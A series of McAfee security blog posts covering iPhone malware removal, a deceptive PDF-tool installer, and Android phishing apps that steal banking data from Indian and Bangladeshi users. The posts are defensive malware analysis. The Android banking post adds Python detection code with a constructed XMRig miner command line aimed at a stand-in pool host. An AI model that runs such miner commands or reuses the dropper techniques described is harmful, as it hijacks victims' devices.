    A factory reset should be your last resort when other removal methods have failed, as it is a complete data wipe. That means it will erase all content and settings, including any malicious apps, profiles, or files, returning the software to its original, out-of-the-box state. That’s why it’s crucial to back up your essential data such as photos and contacts first. Also, remember to restore to an iCloud backup version *before* the malware infection to avoid reintroducing the infection. For the highest level of security, set the iPhone up as new and manually redownload trusted apps from the App Store. When you are ready to reset, go to Settings > General > Transfer or Reset iPhone > Erase All Content and Settings > Set Up as New iPhone.

    How to detect spyware on your iPhone

    Spyware is designed to be sneaky, but it leaves subtle traces. Pay attention to your iPhone’s behavior, such as the camera or microphone unexpectedly activating as indicated by a green or orange dot in the status bar, sudden battery drain, or your device overheating for no reason. Another major red flag is a spike in data usage when you aren’t actively using your phone.

    For a deeper look, do this 5-minute check to see which apps have accessed your data, camera, and microphone. Look for any activity that seems suspicious or that you don’t recall authorizing. 

    5-minute spyware check:

    • Scan for unknown apps: Scroll through your home screens and App Library for any apps you didn’t install.
    • Review the App Privacy Report: Check for recent sensor or network activity from apps that shouldn’t be active. Go to Settings > Privacy & Security > App Privacy Report.
    • Check for unusual profiles: Go to Settings > General > VPN & Device Management. Remove any profiles you don’t recognize.
    • Look at battery usage: In Settings > Battery, look for unfamiliar apps consuming significant power.

    Removing spyware from your iPhone

    If you suspect your iPhone has been compromised, it’s important to act quickly. Here’s a step-by-step process to remove it, restore your privacy, and prevent future threats.

    1. Back up your essential data: Before making any changes, back up your photos, contacts, and other important files. Ensure you back up to a trusted location like iCloud or your computer.
    2. Update to the latest iOS: Apple frequently releases security patches. Go to Settings > General > Software Update and install any available updates to close vulnerabilities that spyware might exploit.
    3. Delete suspicious apps and profiles: Remove any apps you don’t recognize. Additionally, go to Settings > General > VPN & Device Management and delete any configuration profiles that you did not install yourself.
    4. Change your passwords: Once your device is clean, immediately change the passwords for your critical accounts, including your Apple ID, email, and banking apps.
    5. Enable two-factor authentication (2FA): For an added layer of security, enable 2FA on all important accounts, to make it much harder for anyone to gain unauthorized access, even if they have your password.
    6. Run a mobile security scan: The most reliable way to detect spyware is with a trusted mobile security app that can perform a comprehensive system scan to help flag any remaining malicious files or settings.
    7. When to escalate: If you suspect you are a victim of stalking or that your device was compromised for illegal activities, contact Apple Support for assistance and consider reporting the incident to law enforcement.

    Don’t engage with fake virus pop-up scams

    A common tactic used by scammers is the fake virus pop-up. These alarming messages appear while you are browsing, often using logos from Apple or other trusted companies, and claim your iPhone is infected. Their goal is to create panic, urging you to click a link, download a fake app, or call a fraudulent support number. Never interact with these pop-ups. Here’s a quick response plan when dealing with fake virus pop-up ads: 

    • The correct action is to close the Safari tab or the entire browser immediately. 
    • To be safe, clear your browsing data by going to Settings > Safari > Clear History and Website Data. This action removes any lingering scripts from the malicious page. 
    • You can also report phishing pages to help protect others.

    Never enter personal information, passwords, or payment details on a page that appears from a pop-up ad.

    Avoid malware from the start

    The best way to protect your iOS device is to avoid malware in the first place. Follow these security measures to safeguard your device:

    • If you receive unexpected or unsolicited emails or texts, think before you tap the suspicious links to avoid phishing traps.
    • Stick only with apps from the Apple App Store. Avoid installing apps from unvetted third-party stores.
    • Protect your device’s built-in defenses by avoiding the temptation to jailbreak your iPhone as this will remove most Apple security features.
    • Enable automatic updates of iOS and iTunes to stay in line with Apple’s security updates and bug fixes.
    • Back up your iPhone data regularly to iCloud or a computer so you can always restore it.
    • Avoid engaging with suspicious text messages on iMessage, as hackers use them to spread phishing scams.
    • Enable two-factor authentication on your Apple ID for a powerful extra layer of security.
    • Routinely review your app permissions to ensure they only have access to necessary data.
    • Install a trusted security app, such as McAfee Mobile Security, for proactive scanning and web protection.

    FAQs about iPhone malware

    Can my iPhone get a virus from opening an email?
    Simply opening an email is very unlikely to infect your iPhone. However, clicking a malicious link or downloading an attachment from a phishing email can lead you to a harmful website or trick you into compromising your information. It’s the action you take, not opening the email itself, that creates the risk.

    How do I know if a virus warning is real or fake?
    Any pop-up in your browser that claims your iPhone has a virus is fake. Apple does not send notifications like this. These are scare tactics designed to trick you into clicking a link or calling a fake support number. The safest response is to close the browser tab and clear your browsing data.

    Does my iPhone really need antivirus software?
    It’s a misconception that iPhones are immune to all viruses. While Apple’s built-in security provides a strong defense, it doesn’t offer complete protection. Cybercriminals are increasingly using phishing, smishing, AI voice cloning, deepfake videos and other social engineering methods to target iPhone users. A comprehensive security app provides layered protection beyond the iOS integrated security. Think of it as adding a professional security guard to already-strong walls.

    What is the best way to check my iPhone for a virus or malware for free?
    You can perform manual checks for free by looking for suspicious apps, checking for unusual battery drain and data usage, and reviewing your App Privacy Report. While helpful for spotting obvious issues, these manual checks aren’t foolproof. A dedicated security app offers a more reliable and thorough analysis.

    Can an iPhone get malware without jailbreaking it?
    Yes. While jailbreaking significantly increases the risk, malware can still infect a non-jailbroken iPhone. This typically happens through sophisticated phishing attacks, installing malicious configuration profiles from untrusted sources, or, in very rare cases, by exploiting an unknown vulnerability in iOS, known as a “zero-day” attack.

    Is an iPhone malware scan truly necessary?
    Given the value of the personal data on our phones, a regular malware scan provides significant peace of mind. A reputable security app can identify vulnerabilities you might miss, such as outdated software or risky system settings, helping you maintain a strong security posture.

    Final thoughts on iPhone malware protection

    Keeping your iPhone secure from malware is an achievable goal that puts you in control of your digital safety. By combining smart habits with powerful security tools, you can confidently protect your personal information from emerging threats. 

    McAfee is committed to empowering you with the resources and protection needed to navigate the online world safely. McAfee Mobile Security provides full protection against various types of malware targeting the Apple ecosystem. With safe browsing features, a secure VPN, and antivirus software, McAfee Security for iOS delivers protection against emerging threats, so you can continue to use your iPhone with peace of mind. Download the McAfee Mobile Security app today and get all-in-one protection.

    The post A Guide to Remove Malware From Your iPhone appeared first on McAfee Blog.

    Think Before You Click: EPI PDF’s Hidden Extras

    Authored by: Anuradha & Prabudh

    PDF converting software can be super helpful. Whether you’re turning a Word document into a PDF or merging files into one neat package, these tools save time and make life easier.

    But here’s something many people don’t realize — some of these free PDF tools come with hidden baggage. When you install them, they might also sneak in a new search engine, browser extension, or change your homepage without clearly asking for permission. 

    What’s Going On?

    Some PDF software is bundled with extra programs. That means when you download and install the PDF converter, it may also install:

    • A new search engine in your browser
    • Toolbars or browser extensions
    • Apps that run in the background on your computer

    Most of the time, these are not viruses, but they can slow down your computer, change your browsing experience, and even collect your data.

    Geographical Customer Prevalence

    The heat map below illustrates the prevalence of EPI PDF software in the field in Q2, 2025.

    We see that the top country encountering this software is the United States of America with over 118,000 McAfee device encounters.

    Why Do They Do This?

    Many free software companies make money by including these extras. Other companies pay them to promote their search tools or browser extensions. It’s a way for them to earn something in return for offering the software for free.

    During our daily threat hunting at McAfee to protect our customers, we came across one such bundler application, EPI PDF Editor, whose behavior toward the end user is clearly deceptive.

    Key Takeaways:

    1. Read Before You Click “Next”
      Always take a moment during installation to read what each screen says. Look for checkboxes that let you “opt out” of installing extra software.
    2. Choose “Custom” or “Advanced” Installation
      This gives you more control over what gets installed on your computer.
    3. Download From Trusted Sources
      Stick to well-known websites or the official site of the PDF software. Avoid shady download links from ads or pop-ups.
    4. Use Built-In Tools
      Many operating systems (like Windows or macOS) already have simple PDF features like printing to PDF or viewing files, so you might not need extra software at all.
    5. Check Your Browser
      If your homepage suddenly changes or you see a new search engine, go to your browser settings and change it back.

    McAfee researches such applications proactively, and we review the EULA and Privacy Policy regularly for new applications.

    Technical Analysis

    EPI PDF Editor is distributed as an MSI installer. Upon launching, the installer window includes a pre-selected option to “Import your current browser settings into EPI PDF,” a choice that appears unrelated to the tool’s intended purpose of handling PDF documents. Unless the user actively opts out by unchecking the box, this import proceeds automatically.

    Installer Branding Mismatch

    The installer is branded as “PDF Converter,” indicating that it is designed for typical PDF tasks such as viewing, converting, splitting, merging, and watermarking documents. However, the inclusion of an opt-out option to import browser settings raises questions about the application’s true functionality.

    Figure 1: Import browser settings

    Privacy Policy Conflict

    A closer examination of the software’s Privacy Policy and Terms reveals a deceptive practice at play. Although the application is marketed as a PDF Converter, the legal documentation tells a different story. As shown in Figure 2, the Privacy Policy of the program—branded as EPIbrowser—explicitly defines the software as a browser designed for Windows-based devices. The screenshot displays both the EPIbrowser logo and the policy text, clearly indicating that the user is not installing a PDF tool, but rather a web browser disguised as one.

    Figure 2: Application name in terms & conditions

    Figure 3: Application meaning in terms


    McAfee’s *PUP Policy states that software installers must provide software licensing information prior to installing any bundled components. No “installation completed” window appears; instead, a Chromium-based browser opens with a single tab that is itself deceptive: options to edit the opened PDF are shown, but none of them performs any action. Other tabs can be opened to browse the internet.

    Figure 4: Tab in EPI Browser

    The McAfee PUP policy criterion violated here is “Installation: whether the user can make an informed decision about the software installation or add-ons and can adequately back out of any undesired installations.” Another suspicious behavior is the install location: the application runs from ‘Appdata/Temp’ rather than from Program Files or Program Files (x86). Further, when checking Control Panel we found that the sample had created its entry under the name EPI Browser only, from which it can be uninstalled. Due to this deceptive behavior, which aligns with McAfee’s violation criteria, the application has been classified as a Potentially Unwanted Program (PUP).

    The McAfee WebAdvisor browser extension warns users when attempting to navigate to websites known to distribute PUPs.

    Figure 5: McAfee Web Advisor Warning

    Bottom Line

    Free PDF tools are useful — but be aware of what else might come with them. A few extra minutes of reading can save you from hours of frustration later. ✅

    Stay smart. Stay safe. And always know what you’re really installing.

    Indicators of Compromise

    App Name: EPI PDF Editor
    Distributed under different file names: viewpdftools.msi, onestartpdfdirect.msi, PDFSmartKit.msi, pdfzonepro.msi, 6c9136.msi, OneStartPDF-v4.5.282.2.msi
    SHA256: c2d1ac2511eb2749cdc7ae889d484c246d3bd1e740725dc4dd2813c4b4d05c7b

    In a digital world where convenience often comes at a hidden cost, it’s crucial to be vigilant about the software we install — especially free tools like PDF converters. As the case of EPI PDF Editor highlights, not all applications are what they claim to be. Deceptive installations, hidden browser hijackers, and unauthorized data collection can compromise both your privacy and your device’s performance. By staying informed and cautious — reading installation prompts, choosing advanced options, and relying on trusted sources — you can protect yourself from potentially unwanted programs and avoid falling into these traps.

    At McAfee, our goal is to help users stay one step ahead of deceptive software. Awareness is your first line of defense. So, the next time you download a free tool, take a moment to think before you click. Because what seems like a simple installation could be opening the door to much more.


    *PUP: Potentially Unwanted Program, a program that delivers unwanted additions such as ads, browser add-ons, search engine modifications, or extra programs alongside the software a user actually wants for daily use.

    The post Think Before You Click: EPI PDF’s Hidden Extras appeared first on McAfee Blog.

    Android Malware Targets Indian Banking Users to Steal Financial Info and Mine Crypto

    Authored by Dexter Shin

    McAfee’s Mobile Research Team discovered a new Android malware campaign targeting Hindi-speaking users, mainly in India. The malware impersonates popular Indian financial apps, including SBI Card, Axis Bank, and IndusInd Bank, and is distributed through phishing websites that are continuously being created. What makes this campaign unique is its dual-purpose design: it steals personal and financial information while also silently mining Monero cryptocurrency using XMRig, which is triggered via Firebase Cloud Messaging (FCM). It also abuses user trust by pretending to be a legitimate app update from Google Play.

    McAfee, as part of the App Defense Alliance committed to protecting users and the app ecosystem, reported the identified malicious apps to Google. As a result, Google blocked the associated FCM account to prevent further abuse. Also, McAfee Mobile Security detects all of these apps as High-Risk threats. For more information, visit McAfee’s Mobile Security page.

    This campaign targets Indian users by impersonating legitimate financial services to lure victims into installing a malicious app. This is not the first malware campaign targeting Indian users. In the past, McAfee has reported other threats. In this case, the attackers take it a step further by using real assets from official banking websites to build convincing phishing pages that host the malware payload. The app delivered through these phishing sites functions as a dropper, meaning it initially appears harmless but later dynamically loads and executes the actual malicious payload. This technique helps evade static detection and complicates analysis.

    Apart from delivering a malicious payload, the malware also mines cryptocurrency on infected mobile devices. When the malware receives specific commands via FCM, it silently initiates a background mining process for Monero (XMR). Monero is a privacy-focused cryptocurrency that hides transaction addresses, sender and receiver identities, and transaction amounts. Because of these privacy features, cybercriminals often use it to stay hidden and move illegal money without getting caught. Its mining algorithm, RandomX, is optimized for general-purpose CPUs, making it possible to mine Monero efficiently even on mobile devices.

    Technical Findings

    Distribution Methods

    The malware is distributed through phishing websites that impersonate Indian financial services. These sites are designed to closely resemble official banking sites and trick users into downloading a fake Android app. Here are some phishing sites we found during our investigation.

    Figure 1. Screenshot of a phishing website


    These phishing pages load images, JavaScript, and other web resources directly from the official websites to appear legitimate. However, they include additional elements such as “Get App” or “Download” buttons, which prompt users to install the malicious APK file.

    Dropper Analysis

    When the app is launched, the first screen the user sees looks like a Google Play Store page. It tells the user that they need to update the app.

    Figure 2. The initial screen shown by the dropper app

    The app includes an encrypted DEX file stored in the assets folder. This file is not the actual malicious payload, but a loader component. When the app runs, it decrypts this file using an XOR key and dynamically loads it into memory. The loaded DEX file contains custom code, including a method responsible for loading additional payloads.

    Figure 3. First-stage encrypted loader DEX and XOR key

    Once the first-stage DEX is loaded, the loader method inside it decrypts and loads a second encrypted file, which is also stored in the assets. This second file contains the final malicious payload. By splitting the loading process into two stages, the malware avoids exposing any clearly malicious code in the main APK and makes static analysis more difficult.

    Figure 4. Second-stage malicious payload loaded by Loader class
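    For analysts triaging a dropper like this one, the XOR-encrypted DEX stages can be spotted without knowing the key in advance, because the DEX header carries fixed fields (magic, header_size, endian_tag) and a file_size field that together act as known plaintext. The Python below is an added example, not McAfee’s tooling; it assumes a repeating XOR key of at most 12 bytes (the page does not state the real key’s length), and the sample asset files are constructed.

```python
"""Detect XOR-encrypted DEX files hidden among an APK's assets and recover the key.

The DEX header has fixed fields (magic, header_size, endian_tag) and a file_size
field equal to the length of the file, which together give enough known
plaintext to derive a short repeating XOR key. Added example: it assumes a
repeating key of at most MAX_KEY_LEN bytes, and the sample assets are constructed.
"""
import struct
from typing import Dict, Optional

DEX_VERSIONS = (b"035", b"037", b"038", b"039")
HEADER_SIZE = 0x70          # every DEX header is 112 bytes
ENDIAN_CONSTANT = 0x12345678
MAX_KEY_LEN = 12            # known-plaintext offsets 0-7 and 32-43 cover every
                            # key-byte position for key lengths up to 12


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR (the same operation encrypts and decrypts)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def known_header_bytes(file_size: int, version: bytes) -> Dict[int, int]:
    """Offsets in a DEX header whose plaintext is fixed or derivable:
    magic at 0-7, file_size at 32-35, header_size at 36-39, endian_tag at 40-43."""
    magic = b"dex\n" + version + b"\0"
    tail = struct.pack("<III", file_size, HEADER_SIZE, ENDIAN_CONSTANT)
    known = {off: b for off, b in enumerate(magic)}
    known.update({32 + off: b for off, b in enumerate(tail)})
    return known


def is_dex_header(header: bytes, file_size: int) -> bool:
    """Sanity check on a decrypted header."""
    if header[:4] != b"dex\n" or header[4:7] not in DEX_VERSIONS or header[7] != 0:
        return False
    size, hsize, endian = struct.unpack_from("<III", header, 32)
    return size == file_size and hsize == HEADER_SIZE and endian == ENDIAN_CONSTANT


def recover_xor_key(blob: bytes, max_key_len: int = MAX_KEY_LEN) -> Optional[bytes]:
    """Return the shortest repeating XOR key under which `blob` is a DEX file,
    or None if no consistent key of length <= max_key_len exists."""
    if len(blob) < HEADER_SIZE:
        return None
    for version in DEX_VERSIONS:
        known = known_header_bytes(len(blob), version)
        for klen in range(1, max_key_len + 1):
            key: list = [None] * klen
            consistent = True
            for off, plain in known.items():
                k = blob[off] ^ plain
                if key[off % klen] is None:
                    key[off % klen] = k
                elif key[off % klen] != k:
                    consistent = False   # two known bytes disagree on this key byte
                    break
            if not consistent or None in key:
                continue
            candidate = bytes(key)
            if is_dex_header(xor_bytes(blob[:HEADER_SIZE], candidate), len(blob)):
                return candidate
    return None


def find_encrypted_dex(assets: Dict[str, bytes]) -> Dict[str, bytes]:
    """Map asset name -> recovered key for every asset that is a XOR'd DEX file."""
    hits = {}
    for name, blob in assets.items():
        key = recover_xor_key(blob)
        if key is not None:
            hits[name] = key
    return hits


def build_sample_dex(total_size: int) -> bytes:
    """Constructed stand-in for a DEX file: a valid header (checksum and
    signature left zero) followed by filler. Not a real loader or payload."""
    header = bytearray(HEADER_SIZE)
    header[0:8] = b"dex\n035\0"
    struct.pack_into("<III", header, 32, total_size, HEADER_SIZE, ENDIAN_CONSTANT)
    filler = bytes((i * 7) & 0xFF for i in range(total_size - HEADER_SIZE))
    return bytes(header) + filler


# Constructed sample assets: one XOR'd DEX under an innocuous name, one PNG header.
SAMPLE_KEY = b"\x5a\xa5\x3c\xc3\x0f"
SAMPLE_ASSETS = {
    "config.bin": xor_bytes(build_sample_dex(512), SAMPLE_KEY),
    "logo.png": b"\x89PNG\r\n\x1a\n" + bytes(200),
}

if __name__ == "__main__":
    for name, key in find_encrypted_dex(SAMPLE_ASSETS).items():
        print(f"{name}: XOR-encrypted DEX, key {key.hex()}")
```

    The same routine can be pointed at the second-stage asset once the first stage is decrypted, since both stages are described as XOR-encrypted DEX files.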

    Once this payload is loaded, the app displays a fake financial interface that looks like a real app. It prompts the user to input sensitive details such as their name, card number, CVV, and expiration date. The collected information is then sent to the attacker’s command-and-control (C2) server. After submission, the app shows a fake card management page with messages like “You will receive email confirmation within 48 hours,” giving the false impression that the process is ongoing. All features on the page are fake and do not perform any real function.


    Figure 5. Fake card verification screen

    Monero Mining Process

    As mentioned earlier, one of this campaign’s key features is its hidden cryptomining functionality. The app includes a service that listens for specific FCM messages, which trigger the start of the mining process.


    Figure 6. Firebase messaging service is declared in the manifest.


    In the second-stage dynamically loaded code, there is a routine that attempts to download a binary file from external sources. The malware contains 3 hardcoded URLs and tries to download the binary from all of them.

    Figure 7. Hardcoded URLs used by the malware to download a binary file


    The downloaded binary is encrypted and has a .so extension, which usually indicates a native library. However, instead of loading it normally, the malware uses ProcessBuilder, a Java class for running external processes, to directly execute the file like a standalone binary.

    Figure 8. Executing downloaded binary using ProcessBuilder

    What’s particularly interesting is the way the binary is executed. The malware passes a set of arguments to the process that exactly match the command-line options used by XMRig, an open-source mining tool. These include specifying the mining pool server and setting the target coin to Monero.

    Figure 9. XMRig-compatible arguments passed to the mining process


    When the decrypted binary is executed, it displays log messages identical to those produced by XMRig. In summary, this malware is designed to mine Monero in the background on infected devices when it receives specific FCM messages.

    Figure 10. Decrypted binary showing XMRig log messages
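    On the defender side, the XMRig-style argument list described above is a usable detection signal in process-creation telemetry: a pool URL plus a Monero coin or RandomX algorithm, launched from a file with a .so extension, is a combination no legitimate banking app produces. The Python below is an added example, not McAfee’s detection logic; the option names are XMRig’s public command-line options and the sample command lines are constructed.

```python
"""Flag process launches whose arguments look like an XMRig mining session.

Intended to run over process-creation telemetry, one command line per event.
Added example: the option names are XMRig's public command-line options and
the sample command lines below are constructed.
"""
import shlex
from typing import Dict, List, Optional
from urllib.parse import urlparse

# XMRig options that characterise a mining session
POOL_OPTS = ("-o", "--url")
USER_OPTS = ("-u", "--user")
COIN_OPTS = ("--coin",)
ALGO_OPTS = ("-a", "--algo")
MONERO_ALGOS = {"rx", "rx/0", "randomx"}   # RandomX variants used for Monero


def parse_options(argv: List[str]) -> Dict[str, str]:
    """Collect --opt=value, --opt value and -o value pairs; bare flags map to ''."""
    opts: Dict[str, str] = {}
    i = 1
    while i < len(argv):
        tok = argv[i]
        if tok.startswith("--") and "=" in tok:
            name, value = tok.split("=", 1)
            opts[name] = value
        elif tok.startswith("-") and i + 1 < len(argv) and not argv[i + 1].startswith("-"):
            opts[tok] = argv[i + 1]
            i += 1
        elif tok.startswith("-"):
            opts[tok] = ""
        i += 1
    return opts


def first_present(opts: Dict[str, str], names) -> Optional[str]:
    """Value of the first option in `names` that appears in `opts`, else None."""
    for name in names:
        if name in opts:
            return opts[name]
    return None


def pool_host(url: str) -> Optional[str]:
    """Hostname of a pool URL, with or without a stratum+tcp:// style scheme."""
    if "://" not in url:
        url = "//" + url
    return urlparse(url).hostname


def assess_process(cmdline: str) -> dict:
    """Return the indicators found in one command line plus a miner_like verdict."""
    argv = shlex.split(cmdline)
    opts = parse_options(argv)
    pool = first_present(opts, POOL_OPTS)
    coin = (first_present(opts, COIN_OPTS) or "").lower()
    algo = (first_present(opts, ALGO_OPTS) or "").lower()

    indicators = []
    if pool:
        indicators.append("pool_url")
    if first_present(opts, USER_OPTS) is not None:
        indicators.append("wallet_or_user")
    if coin == "monero" or algo in MONERO_ALGOS:
        indicators.append("monero_target")
    # the analysed sample ran a file with a .so extension as a standalone process
    if argv and argv[0].endswith(".so"):
        indicators.append("so_executed_as_binary")

    miner_like = "pool_url" in indicators and (
        "monero_target" in indicators or "wallet_or_user" in indicators)
    return {
        "miner_like": miner_like,
        "indicators": indicators,
        "pool": pool_host(pool) if pool else None,
        "coin": coin or None,
    }


# Constructed sample telemetry: one miner-style launch, one ordinary process.
SAMPLE_MINER_CMD = ("/data/data/com.example.app/files/lib.so "
                    "-o pool.invalid:3333 -u WALLET_PLACEHOLDER --coin monero -k -B")
SAMPLE_BENIGN_CMD = "/system/bin/ls -l /sdcard"

if __name__ == "__main__":
    for cmd in (SAMPLE_MINER_CMD, SAMPLE_BENIGN_CMD):
        print(assess_process(cmd))
```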

    Recommendations and Conclusion


    Figure 11. Geographic distribution of infected devices

    Telemetry shows that most infections are concentrated in India, which aligns with the campaign’s use of Hindi language and impersonation of Indian financial apps. A small number of detections were also observed in other regions, but these appear to be limited.

    What makes this campaign notable is its dual-purpose design, combining financial data theft with background cryptomining, triggered remotely via Firebase Cloud Messaging (FCM). This technique allows the malware to remain dormant and undetected until it receives a specific command, making it harder for users and defenders to detect.

    To stay protected, users are strongly advised to download apps only from trusted sources such as Google Play, and to avoid clicking on links received through SMS, WhatsApp, or social media—especially those promoting financial services. It is also important to be cautious when entering personal or banking information into unfamiliar apps. In addition, using a reliable mobile security solution that can detect malicious apps and block phishing websites can provide an added layer of protection against threats like this.

    Indicators of Compromise (IOCs)


    The post Android Malware Targets Indian Banking Users to Steal Financial Info and Mine Crypto appeared first on McAfee Blog.

    Fake Android Money Transfer App Targeting Bengali-Speaking Users

    Authored by Dexter Shin

    McAfee’s Mobile Research Team discovered a new and active Android malware campaign targeting Bengali-speaking users, mainly Bangladeshi people living abroad. The app poses as popular financial services like TapTap Send and AlimaPay. It is distributed through phishing sites and Facebook pages, and the app steals users’ personal and financial information. The campaign remains highly active, with the command-and-control (C2) server operational and connected to multiple evolving domains. While the attack techniques are not new, the campaign’s cultural targeting and sustained activity reflect how cybercriminals continue to adapt their strategies to reach specific communities. McAfee Mobile Security already detects this threat as Android/FakeApp. For more information, visit McAfee Mobile Security.

    Bangladeshi people living abroad, particularly in countries such as Saudi Arabia, the UAE, Malaysia, and the UK, rely heavily on mobile money services to send remittances and verify their identities for various purposes. Services like bKash, TapTap Send, and AlimaPay are widely used and trusted within this community.

    In 2024, annual remittances sent to Bangladesh reached nearly $26.6 billion, ranking sixth globally and third in South Asia. This massive flow of cross-border funds highlights the economic importance and digital engagement of the Bangladeshi diaspora.


    Figure 1. Top Recipients of Remittances in 2024 (Source: World Bank)


    As more people use mobile financial apps, cybercriminals are finding new ways to trick them using fake apps and phishing websites. Many users trust apps shared by friends or family, and some may not know how to spot scams. This makes them easy targets for attackers.

    In May 2025, McAfee’s Mobile Research Team identified a malware campaign designed to exploit these conditions. The fake Android app impersonates well-known money transfer services and steals personal information such as the user’s name, email address, phone number, and photo ID (such as a passport or national ID card). It also attempts to collect financial data like card numbers through fake in-app pages. Moreover, the C2 server’s storage is publicly exposed, meaning that the stolen data can be accessed by anyone, which significantly increases the risk of abuse.

    Technical Findings

    Distribution Methods

    Over the past few weeks, these fake apps have continued to appear, suggesting an active and sustained campaign targeting Bengali-speaking users. These apps are primarily distributed through phishing websites that mimic trusted remittance services, often shared via fake Facebook pages.

    Figure 2. Screenshot of a phishing website


    The page is written entirely in Bengali, mimicking a legitimate remittance service commonly used by Bangladeshi expatriates. Below is a translated excerpt of the main message shown on the landing page:

    Bengali (original):

    আসসালামু আলাইকুম।

    প্রবাসী ভাইদের জন্য সুখবর। যারা কাজের পাশাপাশি বাড়তি আয় করতে চান, তারা বিকাশ, ফ্ল্যাশলোড ব্যবসা করতে পারেন। সম্পূর্ণ বৈধ উপায়ে। আপনার হাতের মধ্যে রয়েছে মোবাইলের মাধ্যমে। মোবাইল ব্যাংকিং করুন খুব সহজেই।

    English (translation):

    Peace be upon you.

    Good news for our brothers living abroad. If you’re looking to earn extra income along with your job, you can do business with bKash or FlashLoad in a completely legal way. Everything is within your reach through mobile. Mobile banking is very easy.

    In addition to phishing websites, the attackers also created fake Facebook pages that closely resemble legitimate remittance services. These pages often reuse official logos, promotional images, and even videos taken from real financial platforms to appear trustworthy. However, the site links on these pages point to phishing websites hosting the malicious app.

    Figure 3. Fake Facebook page mimicking a legitimate remittance service

    Fake App Analysis

    Once installed, the fake app immediately presents an interface that closely resembles a legitimate remittance application. It supports both Bengali and English language options and shows realistic-looking exchange rates.

    Figure 4. Initial UI of the fake TapTap Send app

    Users can select from a list of countries with large Bangladeshi expatriate populations, such as Maldives, Dubai, Oman, Saudi Arabia, Malaysia, Canada, and India, to simulate money transfers to Bangladeshi Taka (BDT). These details are likely included to establish trust and make the app appear functional. However, these screens serve as bait to encourage users to proceed with account creation and enter personal information. As users continue through the registration flow, the app requests increasingly sensitive data in multiple stages. First, it requests the user’s email address and full name. Then, it prompts them to select their country of residence and provide a valid mobile number. Next, users are asked to choose an account type, either “Personal” or “Agent”, a distinction commonly seen in real remittance platforms.

    Figure 5. Multi-step registration flow (1)


    Following this, the app reaches its most sensitive stage: it asks the user to take and upload a photo of an official ID, such as a passport, national ID (NID), or an e-commerce verification photo. This request is made in the local language and framed as a requirement to complete account setup. After uploading the ID, users are then asked to create a login password and a 5-digit PIN, just like real financial apps. This step makes the app feel more trustworthy and secure, but the collected credentials could later be used in credential stuffing attacks. All of this information is sent to the C2 server and stored, making it available for future fraud or identity theft.


    Figure 6. Multi-step registration flow (2)


    After completing the registration process, users are taken to a fully designed dashboard. The interface mimics a real financial or remittance app, complete with icons for money transfer, bill payment, mobile banking, and even customer support features.


    Figure 7. The fake TapTap Send app’s main dashboard


    The malware includes multiple fake transaction interfaces. These screens simulate mobile money transfers, bill payments, and bank transfers using logos from real services. Although no actual transaction is performed, the app collects all entered information such as phone numbers, account details, PINs, and payment amounts. This data is then transmitted to the C2 server.

    Figure 8. Fake transaction screens that imitate real financial services


    C2 Server and Data Exfiltration

    All the information collected by the fake app, including credentials, contact details, and photo IDs, is stored on the C2 server. However, the server lacks basic security settings. Directory listing is enabled, which means anyone can access the uploaded files without authentication. During our investigation, we found that one of the C2 domains contained 297 image files. These files appear to be photo IDs uploaded by users during the registration process.


    Figure 9. Publicly accessible directory listing on the C2 server


    These ID images include highly sensitive personal information and are publicly accessible. If downloaded or misused, they could pose a serious privacy and identity theft risk.


    Figure 10. Example of a sensitive photo ID image uploaded during app registration


    Figure 11. Geographic distribution of infected devices

    As expected, telemetry shows activity in countries with large Bangladeshi populations abroad, such as Saudi Arabia, Malaysia, Bangladesh, and the United Arab Emirates. This aligns with the app’s targeting of Bengali-speaking users through culturally familiar language and visuals. The campaign remains active, with new phishing domains and variants continuing to appear. Given the evolving nature of this threat and its use of trusted platforms like Facebook to distribute malicious content, users should stay cautious when encountering financial service promotions through social media or unknown websites. We recommend downloading apps only from trusted sources such as Google Play, avoiding links shared via social media, and being extra careful when asked to provide personal or banking information. Using mobile security software that can detect and block these threats is also strongly advised.

    Indicators of Compromise (IOCs)


    The post Fake Android Money Transfer App Targeting Bengali-Speaking Users appeared first on McAfee Blog.

    How to Scan for Viruses and Confirm Your Device Is Safe

    By: McAfee

    New online threats emerge every day, putting our personal information, money and devices at risk. In its 2024 Internet Crime Report, the Federal Bureau of Investigation reports that 859,532 complaints of suspected internet crime—including ransomware, viruses and malware, data breaches, denials of service, and other forms of cyberattack—resulted in losses of over $16 billion—a 33% increase from 2023.

    That’s why it is essential to stay ahead of these threats. One way to combat these is by conducting virus scans using proven software tools that constantly monitor and check your devices while safeguarding your sensitive information. In this article, we’ll go through everything you need to know to run a scan effectively to keep your computers, phones and tablets in tip-top shape.

    What does a virus scan do?

    Whether you think you might have a virus on your computer or devices or just want to keep them running smoothly, it’s easy to do a virus scan.

    Each antivirus program works a little differently, but in general the software will look for known malware with specific characteristics, as well as their variants that have a similar code base. Some antivirus software even checks for suspicious behavior. If the software comes across a dangerous program or piece of code, the antivirus software removes it. In some cases, a dangerous program can be replaced with a clean one from the manufacturer.

    Unmistakable signs of a virus in your device

    Before doing a virus scan, it is useful to know the telltale signs of viral presence in your device. Is your device acting sluggish or having a hard time booting up? Have you noticed missing files or a lack of storage space? Have you noticed emails or messages sent from your account that you did not write? Perhaps you’ve noticed changes to your browser homepage or settings? Maybe you’re seeing unexpected pop-up windows, or experiencing crashes and other program errors. These are just some signs that your device may have a virus, but don’t get too worried yet because many of these issues can be resolved with a virus scan.

    Are free virus scanner tools safe and sufficient?

    Free virus scanner tools, both in web-based and downloadable formats, offer a convenient way to perform a one-time check for malware. They are most useful when you need a second opinion or are asking yourself, “do I have a virus?” after noticing something suspect.

    However, it’s critical to be cautious. For one, cybercriminals often create fake “free” virus checker tools that are actually malware in disguise. If you opt for free scanning tools, it is best to lean on highly reputable cybersecurity brands. On your app store or browser, navigate to a proven online scanning tool with good reviews or a website whose URL starts with “https” to confirm you are in a secure location.

    Secondly, free tools are frequently quite basic and perform only the minimum required service. If you choose to go this path, look for free trial versions that offer access to the full suite of premium features, including real-time protection, a firewall, and a VPN. This will give you a glimpse of a solution’s comprehensive, multi-layered security capability before you commit to a subscription.

    Cloud-based virus solutions

    If safeguarding all your computers and mobile devices individually sounds overwhelming, you can opt for comprehensive security products that protect computers, smartphones and tablets from a central, cloud-based hub, making virus prevention a breeze. Many of these modern antivirus solutions are powered by both local and cloud-based technologies to reduce the strain on your computer’s resources.

    Online virus scan: A step-by-step guide

    This guide will walk you through the simple steps to safely scan your computer using reliable online tools, helping you detect potential threats, and protect your personal data.

    1. Choose a trusted provider

